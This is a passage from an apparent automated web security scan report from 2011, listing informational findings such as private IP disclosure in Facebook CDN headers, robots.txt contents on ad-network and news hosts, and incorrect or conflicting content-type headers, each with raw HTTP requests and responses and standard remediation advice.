X-FB-Server: 10.54.234.59
X-Cnection: close
Content-Length: 6174
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Fri, 24 Jun 2011 13:45:06 GMT
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

15.5. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.110.63

Request

GET /safe_image.php?d=AQASGW_MxBPUusyO&url=http%3A%2F%2Fcdn.mos.techradar.com%2F%2Fclassifications%2Fworld+of+tech%2Fgraphene2-218-85.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=http%3A%2F%2Fwww.techradar.com&border_color=white&header=true&height=300&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.techradar.com&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.110.63
X-Cnection: close
Content-Length: 15128
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Fri, 24 Jun 2011 13:45:06 GMT
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

15.6. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.165.59

Request

GET /safe_image.php?d=AQArpAhxhc_LCA7Y&url=http%3A%2F%2Fcdn.mos.techradar.com%2F%2Fclassifications%2Fworld+of+tech%2Ftransparent_plane-2-218-85.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=http%3A%2F%2Fwww.techradar.com&border_color=white&header=true&height=300&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.techradar.com&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.165.59
X-Cnection: close
Content-Length: 5548
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Fri, 24 Jun 2011 13:45:06 GMT
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

15.7. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.37.36

Request

GET /safe_image.php?d=AQBucHiKW6Ie7eEj&url=http%3A%2F%2Fcdn.mos.techradar.com%2F%2Fclassifications%2Fgadgets%2Fphones%2Fmobile-phones%2Fimages%2Fapple-iphone-in-hand-218-85.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=http%3A%2F%2Fwww.techradar.com&border_color=white&header=true&height=300&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.techradar.com&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.63.37.36
X-Cnection: close
Content-Length: 7144
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Fri, 24 Jun 2011 13:45:06 GMT
Date: Thu, 23 Jun 2011 13:45:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

16. Robots.txt file previous next
There are 17 instances of this issue:

http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adj/sql.home/database
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/pixel
http://ad.z5x.net/imp
http://api.facebook.com/restserver.php
http://b.scorecardresearch.com/p
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.optmd.com/V2/85280/214235/index.html
http://cdn.turn.com/server/ddc.htm
http://cm.g.doubleclick.net/pixel
http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js
http://feeds.bbci.co.uk/news/rss.xml
http://googleads.g.doubleclick.net/pagead/ads
http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js
http://license.icopyright.net/3.7009

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

16.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

16.2. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 23 Jun 2011 13:44:28 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

16.3. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 23 Jun 2011 13:44:51 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

16.4. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Thu, 23 Jun 2011 13:44:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:46 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

16.5. http://ad.z5x.net/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.z5x.net
Path:	/imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.z5x.net

Response

HTTP/1.0 200 OK
Date: Thu, 23 Jun 2011 13:44:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:37 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

16.6. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Sat, 23 Jul 2011 13:44:55 GMT
X-FB-Server: 10.36.32.123
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

16.7. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 24 Jun 2011 11:13:03 GMT
Date: Thu, 23 Jun 2011 11:13:03 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

16.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 23 Jun 2011 13:44:27 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

16.9. http://cdn.optmd.com/V2/85280/214235/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/85280/214235/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Jun 2011 13:49:21 GMT
Connection: close

User-agent: *
Disallow: /

16.10. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Thu, 23 Jun 2011 13:44:53 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

16.11. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 23 Jun 2011 13:44:55 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

16.12. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 23 Jun 2011 13:44:28 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

16.13. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2899
Expires: Thu, 23 Jun 2011 14:35:43 GMT
Date: Thu, 23 Jun 2011 13:47:24 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

16.14. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 23 Jun 2011 13:44:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

16.15. http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ibnlive.in.com
Path:	/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ibnlive.in.com

Response

HTTP/1.0 200 OK
ETag: "42ac37-19c4-4a633198c2340"-gzip
Server: Apache
Last-Modified: Tue, 21 Jun 2011 06:38:29 GMT
Content-Type: text/plain
Cache-Control: max-age=5
Date: Thu, 23 Jun 2011 13:44:29 GMT
Content-Length: 6596
Connection: close

User-agent: *

Disallow: /news/kalmadi-shipped-out-cwg-papers-to-us-sources/138684-3.html
Disallow: /mobile/2/160024.html
Disallow: /conversations/topic/160024-1-2
Disallow: /news/amid-scandal-us
...[SNIP]...

16.16. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:45:32 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

16.17. http://license.icopyright.net/3.7009 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/3.7009

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: license.icopyright.net

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:17:45 GMT
Server: Apache
Last-Modified: Sun, 21 Feb 2010 00:08:39 GMT
ETag: "1600200-7b-480111e5c2fc0"
Accept-Ranges: bytes
Content-Length: 123
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /user/external.act

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /

17. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/js/tiny_mce/tiny_mce.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: application/x-javascript
text/html; charset=UTF-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /rights/js/tiny_mce/tiny_mce.js HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:17:47 GMT
Server: Apache
Last-Modified: Thu, 26 May 2011 03:12:39 GMT
ETag: "2a89026-2b6e1-4a425318e57c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 177889

(function(c){var a=/^\s*|\s*$/g,d;var b={majorVersion:"3",minorVersion:"3.5.1",releaseDate:"2010-05-07",_init:function(){var r=this,o=document,m=navigator,f=m.userAgent,l,e,k,j,h,q;r.isOpera=c.opera&&
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(m.relaxedDomain){E.iframeHTML+='<script type="text/javascript">
...[SNIP]...

18. HTML does not specify charset previous next
There are 4 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://data.inskinmedia.com/trackports/rep/base/track.php
http://ibnlive.in.com/xml/network18/topibnlivewidgets.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

18.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

18.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

18.3. http://data.inskinmedia.com/trackports/rep/base/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.inskinmedia.com
Path:	/trackports/rep/base/track.php

Request

GET /trackports/rep/base/track.php?callback=jsonp1308836665812&type=init&section_id=124045&content_type=PAGESKIN&page_url=http%3A%2F%2Fwww.techradar.com%2Fnews%2Fcomputing%2Finternet%2Fuk-most-paranoid-about-computer-security-suggests-study-969910&failed=0&reason= HTTP/1.1
Host: data.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 23 Jun 2011 13:43:30 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-Length: 25

jsonp1308836665812(null);

18.4. http://ibnlive.in.com/xml/network18/topibnlivewidgets.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ibnlive.in.com
Path:	/xml/network18/topibnlivewidgets.html

Request

GET /xml/network18/topibnlivewidgets.html?random=1308836691305 HTTP/1.1
Host: ibnlive.in.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10516844.1308836680.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10516844.846213115.1308836680.1308836680.1308836680.1; __utmc=10516844; __utmb=10516844.1.10.1308836680; redirect_path_ibn=http%3A//ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 23 Jun 2011 13:30:01 GMT
ETag: "3197c7-e9c-4a66114fce840"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3740
Content-Type: text/html
Expires: Thu, 23 Jun 2011 13:44:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:52 GMT
Connection: close

<style>
nw_mid_contener{ background:#fff; padding:10px;}
.nw_mid_contener h1{font:bold 18px Arial, Helvetica, sans-serif; color:#000; margin:0px; padding-bottom:10px;}
.nw_box1{font:12px Arial, Helve
...[SNIP]...

19. Content type incorrectly stated previous next
There are 9 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.static.techradar.com///default/js/ads_seg_bottom.js
http://data.inskinmedia.com/trackports/rep/base/track.php
http://delivery.steelhousemedia.com/serve
http://getfirebug.com/fonts/TitilliumMaps26L001.woff
http://getfirebug.com/fonts/TitilliumMaps26L002.woff
http://images.outbrain.com/imageserver/s/16837/aX4BWSJRgIsv4moXL4vKEgee-0-95x80.jpg&did=Dvf8N
http://license.icopyright.net/rights/images/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

19.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

19.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

19.3. http://cdn.static.techradar.com///default/js/ads_seg_bottom.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.static.techradar.com
Path:	///default/js/ads_seg_bottom.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET ///default/js/ads_seg_bottom.js HTTP/1.1
Host: cdn.static.techradar.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:32 GMT
Expires: Thu, 23 Jun 2011 14:41:47 GMT
Last-Modified: Thu, 29 May 2008 14:45:29 GMT
Cache-Control: max-age=3600
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: nginx/0.5.29
Content-Length: 49

DM_addEncToLoc("Site","techradar.com");
DM_tag();

19.4. http://data.inskinmedia.com/trackports/rep/base/track.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://data.inskinmedia.com
Path:	/trackports/rep/base/track.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

19.5. http://delivery.steelhousemedia.com/serve previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

19.6. http://getfirebug.com/fonts/TitilliumMaps26L001.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://getfirebug.com
Path:	/fonts/TitilliumMaps26L001.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/TitilliumMaps26L001.woff HTTP/1.1
Host: getfirebug.com
